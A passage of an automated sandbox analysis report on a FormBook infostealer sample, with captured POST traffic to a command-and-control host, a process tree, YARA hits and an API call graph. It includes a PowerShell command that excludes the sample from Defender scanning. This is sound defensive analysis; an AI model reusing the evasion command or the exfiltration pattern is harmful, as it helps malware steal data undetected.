                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zB9CqNsAo7qvfYardYGtVXo7j9icNt0%2Bdc7gyYDGxHInJ6z%2FFKwqjMmz6kYGg%2F%2FB%2FVhzPCaMedOTxzLjwTHyTG6T7Bx03vzf99syg9jxrDJ2cxi7GzhUSZ%2FwmiPtUkd7BMpsabJ7"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6ff586980d0f36-EWR
                                                                                                                    server-timing: cfL4;desc="?proto=
                                                                                                                    Data Raw:
                                                                                                                    Data Ascii:
                                                                                                                    Dec 24, 2024 11:37:59.023078918 CET175INData Raw: 43 50 26 72 74 74 3d 31 34 35 39 26 6d 69 6e 5f 72 74 74 3d 31 34 35 39 26 72 74 74 5f 76 61 72 3d 37 32 39 26 73 65 6e 74 3d 31 26 72 65 63 76 3d 33 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72
                                                                                                                    Data Ascii: CP&rtt=1459&min_rtt=1459&rtt_var=729&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=424&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.45003085.159.66.93801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:38:05.256869078 CET703OUTPOST /uwne/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.letsbookcruise.xyz
                                                                                                                    Origin: http://www.letsbookcruise.xyz
                                                                                                                    Referer: http://www.letsbookcruise.xyz/uwne/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 69 4a 66 61 42 33 42 41 35 72 37 38 70 38 6b 56 6d 57 58 56 45 2f 6b 48 44 34 36 6a 4a 6a 6a 6f 74 77 59 51 62 6b 39 70 7a 64 6a 65 76 65 63 43 4f 49 4d 7a 31 51 79 63 31 68 37 63 52 31 57 4a 6f 66 37 36 68 45 36 39 54 77 36 41 69 71 37 39 73 51 32 6a 2f 6f 7a 77 78 46 72 50 72 68 39 33 36 61 6c 62 64 68 64 78 2f 54 67 51 44 6a 35 58 54 68 67 5a 77 39 54 4c 5a 73 74 6c 4e 4e 77 56 55 4e 70 5a 48 2f 2b 66 76 65 72 2b 61 32 42 5a 6f 79 69 49 55 73 37 51 76 66 6c 2b 56 68 41 4b 71 4e 32 59 52 43 6e 68 4d 4e 73 72 62 6e 57 30 35 34 69 6b 32 6f 51 76 4d 4d 62 4d 37 54 6d 4b 2b 41 3d 3d
                                                                                                                    Data Ascii: APatc2S=iJfaB3BA5r78p8kVmWXVE/kHD46jJjjotwYQbk9pzdjevecCOIMz1Qyc1h7cR1WJof76hE69Tw6Aiq79sQ2j/ozwxFrPrh936albdhdx/TgQDj5XThgZw9TLZstlNNwVUNpZH/+fver+a2BZoyiIUs7Qvfl+VhAKqN2YRCnhMNsrbnW054ik2oQvMMbM7TmK+A==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.45003685.159.66.93801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:38:07.912138939 CET723OUTPOST /uwne/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.letsbookcruise.xyz
                                                                                                                    Origin: http://www.letsbookcruise.xyz
                                                                                                                    Referer: http://www.letsbookcruise.xyz/uwne/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 69 4a 66 61 42 33 42 41 35 72 37 38 72 66 73 56 31 68 4c 56 4d 2f 6b 45 4d 59 36 6a 51 54 6a 6b 74 77 55 51 62 6d 52 48 7a 72 37 65 76 38 45 43 50 4e 77 7a 30 51 79 63 67 52 36 55 56 31 57 41 6f 66 6e 49 68 46 32 39 54 32 57 41 69 71 4c 39 73 48 61 6b 35 34 7a 79 33 46 72 4a 68 42 39 33 36 61 6c 62 64 69 68 62 2f 54 49 51 44 7a 4a 58 51 41 67 59 75 74 54 49 51 4d 74 6c 4a 4e 77 52 55 4e 70 33 48 37 2b 6c 76 63 6a 2b 61 7a 39 5a 72 6e 57 4c 61 73 37 61 79 50 6b 64 64 44 52 30 6b 73 4c 6d 53 54 2f 47 53 4d 73 61 58 42 62 75 6f 4a 44 7a 6b 6f 30 63 52 4c 53 34 32 51 62 44 6c 41 75 57 35 44 41 71 34 63 63 57 72 36 5a 57 4d 55 67 42 55 37 41 3d
                                                                                                                    Data Ascii: APatc2S=iJfaB3BA5r78rfsV1hLVM/kEMY6jQTjktwUQbmRHzr7ev8ECPNwz0QycgR6UV1WAofnIhF29T2WAiqL9sHak54zy3FrJhB936albdihb/TIQDzJXQAgYutTIQMtlJNwRUNp3H7+lvcj+az9ZrnWLas7ayPkddDR0ksLmST/GSMsaXBbuoJDzko0cRLS42QbDlAuW5DAq4ccWr6ZWMUgBU7A=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.45004085.159.66.93801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:38:10.569849014 CET10805OUTPOST /uwne/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.letsbookcruise.xyz
                                                                                                                    Origin: http://www.letsbookcruise.xyz
                                                                                                                    Referer: http://www.letsbookcruise.xyz/uwne/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 69 4a 66 61 42 33 42 41 35 72 37 38 72 66 73 56 31 68 4c 56 4d 2f 6b 45 4d 59 36 6a 51 54 6a 6b 74 77 55 51 62 6d 52 48 7a 72 44 65 76 4a 59 43 4f 75 59 7a 7a 51 79 63 68 52 36 58 56 31 58 43 6f 66 76 4d 68 46 4b 74 54 7a 4b 41 6a 4a 7a 39 37 47 61 6b 77 34 7a 79 31 46 72 49 72 68 39 69 36 65 4a 66 64 69 78 62 2f 54 49 51 44 78 52 58 45 68 67 59 73 74 54 4c 5a 73 74 68 4e 4e 78 47 55 4e 78 42 48 37 71 50 75 73 44 2b 62 54 4e 5a 34 6c 4f 4c 46 63 37 63 68 2f 6b 37 64 44 64 52 6b 74 6d 58 53 54 62 38 53 4d 59 61 45 6c 53 36 33 74 44 75 78 37 6f 6e 4e 61 32 31 75 53 37 37 6a 58 79 76 34 57 55 76 72 73 6f 47 77 49 34 79 59 48 4e 4b 42 73 44 6a 68 63 4b 73 4f 42 6c 6e 57 36 69 4d 68 73 46 6c 6a 7a 39 73 49 6f 69 56 71 4f 47 72 53 5a 34 38 4c 67 77 6d 61 2f 32 57 67 52 61 64 4d 32 5a 4f 31 53 42 79 2b 47 71 58 47 30 6b 76 38 42 72 46 72 63 54 77 6e 63 42 51 54 55 78 32 6c 66 35 32 52 6b 5a 6f 39 53 33 49 37 79 6b 4e 77 72 59 5a 62 36 72 56 53 6d 35 74 52 52 58 4d 46 6e 62 70 36 56 [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=iJfaB3BA5r78rfsV1hLVM/kEMY6jQTjktwUQbmRHzrDevJYCOuYzzQychR6XV1XCofvMhFKtTzKAjJz97Gakw4zy1FrIrh9i6eJfdixb/TIQDxRXEhgYstTLZsthNNxGUNxBH7qPusD+bTNZ4lOLFc7ch/k7dDdRktmXSTb8SMYaElS63tDux7onNa21uS77jXyv4WUvrsoGwI4yYHNKBsDjhcKsOBlnW6iMhsFljz9sIoiVqOGrSZ48Lgwma/2WgRadM2ZO1SBy+GqXG0kv8BrFrcTwncBQTUx2lf52RkZo9S3I7ykNwrYZb6rVSm5tRRXMFnbp6V5T3FjgXtc+SR5WijKcl7TsbacWEbaGvomTd2IPYf4Q5DS/Zzjow6NZG/2wCvKPvCNRpJcjoFQGRfXnvESNGqsfF6N8Z2uLJvgYCbEoEaQzoGyXwmoWdjQpBI5dmIFeRj0MUvmq1ii9KvJ1dc3PejKWnKdlNMgt6QwbnWvTNAM6tlMNavAS7rChF6CkzmH2x3XqMMrs31ww7UJyk9rrfBdyLNi9SP3BpN6QxCdFLE8QG4EsmP8TZWrxqT9V3pDJn9KmBfrmpBt82DOx59jOM/4aoMbyvgBSQqtB/u7tVm7GFPa5VZxi7a3/rti4bIQnuW8mq+dTuZmC5iIJVVLTVwhz1hCGU/ERmHOgnP8SBspZGA6xM7jm4B4GMnp/yN7ePknbyDpcCzfj8T2TK8rrIhhNkpd7p3zrPfTQvRb/MBhZpYMKU6AKpLoPN4pg+6H4F7BPqbjXNGI5Pfrg4ZIacNo1BzL8oxoOqhaYIk6a87AmmWiSN+i95/Ixr57zBSUgDFa+8E4BoGVLOP+KLt625VPvaAcf0rO/xj+S30RNfmZ81PhwvhxX/LCP7zHCI4BP/bs7clXI7eTf6A1bkn2un1SIbjp/Qj6/3fLMrVdfTf5HnxGrnY1oI2ikRtAhWFNB12k9ytP15ibNxoEB4n+jhMBAQx6oir97xnis [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.45004185.159.66.93801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:38:13.224646091 CET427OUTGET /uwne/?APatc2S=vL36CH4RwprLmNwp4Gj6N9R+COmNcwDQlAQSHXNI75nLvOBtYNcxpRKkkR/hR1fY7vPFiFbrOB3asJH5t0/H0b+173/mnxpr58pFYDtgi19qUSBoNlsW/NI=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.letsbookcruise.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Dec 24, 2024 11:38:14.539556026 CET225INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.14.1
                                                                                                                    Date: Tue, 24 Dec 2024 10:38:14 GMT
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    X-Rate-Limit-Limit: 5s
                                                                                                                    X-Rate-Limit-Remaining: 19
                                                                                                                    X-Rate-Limit-Reset: 2024-12-24T10:38:19.3234688Z


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:05:35:13
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\SW_48912.scr.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\SW_48912.scr.exe"
                                                                                                                    Imagebase:0x80000
                                                                                                                    File size:811'528 bytes
                                                                                                                    MD5 hash:B4C5A379D38312666805D0D33E2801B7
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:3
                                                                                                                    Start time:05:35:33
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"
                                                                                                                    Imagebase:0xbe0000
                                                                                                                    File size:433'152 bytes
                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:05:35:33
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:05:35:33
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\SW_48912.scr.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\SW_48912.scr.exe"
                                                                                                                    Imagebase:0x7a0000
                                                                                                                    File size:811'528 bytes
                                                                                                                    MD5 hash:B4C5A379D38312666805D0D33E2801B7
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:05:35:36
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                    File size:496'640 bytes
                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:9
                                                                                                                    Start time:05:35:40
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe"
                                                                                                                    Imagebase:0x700000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:10
                                                                                                                    Start time:05:35:42
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\sdchange.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                                                                                                    Imagebase:0x6f0000
                                                                                                                    File size:40'960 bytes
                                                                                                                    MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:11
                                                                                                                    Start time:05:35:55
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe"
                                                                                                                    Imagebase:0x700000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:12
                                                                                                                    Start time:05:36:07
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:10.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0.8%
                                                                                                                      Total number of Nodes:381
                                                                                                                      Total number of Limit Nodes:27
                                                                                                                      execution_graph 40231 6f83f18 40236 6f82df4 40231->40236 40234 6f80424 OleInitialize 40235 6f83f51 40234->40235 40237 6f82dff 40236->40237 40238 6f83f3b 40237->40238 40240 6f83b88 GetActiveWindow GetFocus 40237->40240 40238->40234 40240->40238 40122 2394668 40123 2394672 40122->40123 40127 2394758 40122->40127 40132 2393e40 40123->40132 40125 239468d 40128 239477d 40127->40128 40138 2394868 40128->40138 40142 2394858 40128->40142 40133 2393e4b 40132->40133 40150 2395e50 40133->40150 40135 239739a 40154 23972e8 40135->40154 40137 23973b4 40137->40125 40140 239488f 40138->40140 40139 239496c 40139->40139 40140->40139 40146 23944c4 40140->40146 40143 2394868 40142->40143 40144 239496c 40143->40144 40145 23944c4 CreateActCtxA 40143->40145 40145->40144 40147 23958f8 CreateActCtxA 40146->40147 40149 23959bb 40147->40149 40149->40149 40151 2395e5b 40150->40151 40152 23972e8 GetFocus 40151->40152 40153 239783f 40152->40153 40153->40135 40155 23972f3 40154->40155 40158 2397348 40155->40158 40157 23979bd 40157->40137 40159 2397353 40158->40159 40162 2397720 40159->40162 40161 2397a9a 40161->40157 40163 239772b 40162->40163 40166 2397750 40163->40166 40165 2397b8d 40165->40161 40167 239775b 40166->40167 40168 2399129 40167->40168 40170 239d890 40167->40170 40168->40165 40171 239d8b1 40170->40171 40172 239d8d5 40171->40172 40174 239da40 40171->40174 40172->40168 40176 239da4d 40174->40176 40175 239da87 40175->40172 40176->40175 40178 239d378 40176->40178 40179 239d383 40178->40179 40180 239e398 40179->40180 40182 239d4a4 40179->40182 40183 239d4af 40182->40183 40184 2397750 GetFocus 40183->40184 40185 239e407 40184->40185 40188 239e888 40185->40188 40186 239e416 40186->40180 40189 239e8b6 40188->40189 40190 239e4e0 GetFocus 40189->40190 40191 239e8df 40189->40191 40190->40191 40241 239db58 40242 239db9e GetCurrentProcess 40241->40242 40244 239dbe9 40242->40244 40245 239dbf0 GetCurrentThread 40242->40245 40244->40245 40246 239dc2d GetCurrentProcess 40245->40246 40247 239dc26 40245->40247 40248 239dc63 GetCurrentThreadId 40246->40248 40247->40246 40250 239dcbc 40248->40250 39795 6f8305e 39798 6f82c08 39795->39798 39799 6f82c13 39798->39799 39803 6f83880 39799->39803 39809 6f83870 39799->39809 39800 6f8306b 39804 6f838cf GetCurrentThreadId 39803->39804 39806 6f83915 39804->39806 39815 6f82d64 39806->39815 39810 6f838cf GetCurrentThreadId 39809->39810 39812 6f83915 39810->39812 39813 6f82d64 EnumThreadWindows 39812->39813 39814 6f83950 39813->39814 39814->39800 39817 6f83970 EnumThreadWindows 39815->39817 39818 6f83950 39817->39818 39818->39800 40192 66780b0 40193 66780ea 40192->40193 40194 6678166 40193->40194 40195 667817b 40193->40195 40200 667773c 40194->40200 40197 667773c 3 API calls 40195->40197 40199 667818a 40197->40199 40202 6677747 40200->40202 40201 6678171 40202->40201 40205 6678ac1 40202->40205 40212 6678ad0 40202->40212 40206 6678ad0 40205->40206 40218 6677784 40206->40218 40209 6678af7 40209->40201 40210 6678b20 CreateIconFromResourceEx 40211 6678b9e 40210->40211 40211->40201 40213 6677784 CreateIconFromResourceEx 40212->40213 40214 6678aea 40213->40214 40215 6678af7 40214->40215 40216 6678b20 CreateIconFromResourceEx 40214->40216 40215->40201 40217 6678b9e 40216->40217 40217->40201 40219 6678b20 CreateIconFromResourceEx 40218->40219 40220 6678aea 40219->40220 40220->40209 40220->40210 39777 6f82ff0 39780 6f80424 39777->39780 39779 6f83021 39781 6f8042f 39780->39781 39783 6f830f1 39781->39783 39784 6f82cdc 39781->39784 39783->39779 39786 6f82ce7 39784->39786 39785 6f8340b 39785->39783 39786->39785 39788 6f82cf8 39786->39788 39789 6f83440 OleInitialize 39788->39789 39790 6f834a4 39789->39790 39790->39785 39791 6f84160 PostMessageW 39792 6f841cc 39791->39792 39793 239dda0 DuplicateHandle 39794 239de36 39793->39794 40251 239bac0 40252 239bb08 GetModuleHandleW 40251->40252 40253 239bb02 40251->40253 40254 239bb35 40252->40254 40253->40252 39819 6f821c3 39820 6f82190 39819->39820 39821 6f8225f 39819->39821 39821->39820 39824 6f82448 39821->39824 39830 6f82438 39821->39830 39825 6f824ab 39824->39825 39826 6f825bd GetActiveWindow 39825->39826 39828 6f825eb 39825->39828 39829 6f82689 39825->39829 39826->39828 39828->39829 39836 6f801b8 39828->39836 39829->39820 39831 6f824ab 39830->39831 39832 6f825bd GetActiveWindow 39831->39832 39834 6f825eb 39831->39834 39835 6f82689 39831->39835 39832->39834 39833 6f801b8 MessageBoxW 39833->39835 39834->39833 39834->39835 39835->39820 39837 6f83db8 MessageBoxW 39836->39837 39839 6f83e44 39837->39839 39839->39829 39840 6f81a33 39841 6f81991 39840->39841 39842 6f819dd 39841->39842 39843 6f81aea 39841->39843 39844 6f819b6 39841->39844 39842->39844 39914 6f82318 39842->39914 39919 6f82308 39842->39919 39843->39844 39850 6f84fc8 39843->39850 39871 6f85018 39843->39871 39893 6f84fb8 39843->39893 39851 6f84fd0 39850->39851 39863 6f84fea 39851->39863 39924 6f85bb9 39851->39924 39928 6f853a7 39851->39928 39938 6f854a4 39851->39938 39945 6f85523 39851->39945 39952 6f856e0 39851->39952 39959 6f8590d 39851->39959 39964 6f8554c 39851->39964 39968 6f8570b 39851->39968 39975 6f85996 39851->39975 39981 6f853f5 39851->39981 39991 6f85833 39851->39991 39996 6f854b3 39851->39996 40005 6f85ab2 39851->40005 40012 6f85771 39851->40012 40016 6f853d0 39851->40016 40027 6f85670 39851->40027 40034 6f8547f 39851->40034 40041 6f859fb 39851->40041 39863->39844 39872 6f84fd0 39871->39872 39873 6f85026 39871->39873 39874 6f85bb9 2 API calls 39872->39874 39875 6f859fb 2 API calls 39872->39875 39876 6f8547f 4 API calls 39872->39876 39877 6f85670 4 API calls 39872->39877 39878 6f853d0 6 API calls 39872->39878 39879 6f85771 2 API calls 39872->39879 39880 6f85ab2 4 API calls 39872->39880 39881 6f854b3 6 API calls 39872->39881 39882 6f85833 2 API calls 39872->39882 39883 6f853f5 6 API calls 39872->39883 39884 6f85996 2 API calls 39872->39884 39885 6f84fea 39872->39885 39886 6f8570b 4 API calls 39872->39886 39887 6f8554c 2 API calls 39872->39887 39888 6f8590d 2 API calls 39872->39888 39889 6f856e0 4 API calls 39872->39889 39890 6f85523 4 API calls 39872->39890 39891 6f854a4 4 API calls 39872->39891 39892 6f853a7 6 API calls 39872->39892 39873->39844 39874->39885 39875->39885 39876->39885 39877->39885 39878->39885 39879->39885 39880->39885 39881->39885 39882->39885 39883->39885 39884->39885 39885->39844 39886->39885 39887->39885 39888->39885 39889->39885 39890->39885 39891->39885 39892->39885 39894 6f84fd0 39893->39894 39895 6f84fea 39894->39895 39896 6f85bb9 2 API calls 39894->39896 39897 6f859fb 2 API calls 39894->39897 39898 6f8547f 4 API calls 39894->39898 39899 6f85670 4 API calls 39894->39899 39900 6f853d0 6 API calls 39894->39900 39901 6f85771 2 API calls 39894->39901 39902 6f85ab2 4 API calls 39894->39902 39903 6f854b3 6 API calls 39894->39903 39904 6f85833 2 API calls 39894->39904 39905 6f853f5 6 API calls 39894->39905 39906 6f85996 2 API calls 39894->39906 39907 6f8570b 4 API calls 39894->39907 39908 6f8554c 2 API calls 39894->39908 39909 6f8590d 2 API calls 39894->39909 39910 6f856e0 4 API calls 39894->39910 39911 6f85523 4 API calls 39894->39911 39912 6f854a4 4 API calls 39894->39912 39913 6f853a7 6 API calls 39894->39913 39895->39844 39896->39895 39897->39895 39898->39895 39899->39895 39900->39895 39901->39895 39902->39895 39903->39895 39904->39895 39905->39895 39906->39895 39907->39895 39908->39895 39909->39895 39910->39895 39911->39895 39912->39895 39913->39895 39915 6f8232c 39914->39915 40103 6f823f8 39915->40103 40109 6f82389 39915->40109 39916 6f82356 39916->39844 39920 6f8232c 39919->39920 39922 6f823f8 3 API calls 39920->39922 39923 6f82389 3 API calls 39920->39923 39921 6f82356 39921->39844 39922->39921 39923->39921 40045 6f80df8 39924->40045 40049 6f80df0 39924->40049 39925 6f85bd7 39929 6f853b1 39928->39929 39930 6f8542f 39929->39930 40053 6f81578 39929->40053 40057 6f8156d 39929->40057 39930->39863 39931 6f8549d 39930->39931 40061 6f861b8 39930->40061 40066 6f861a8 39930->40066 40071 6f808e1 39930->40071 40075 6f808e8 39930->40075 39931->39863 39940 6f8548b 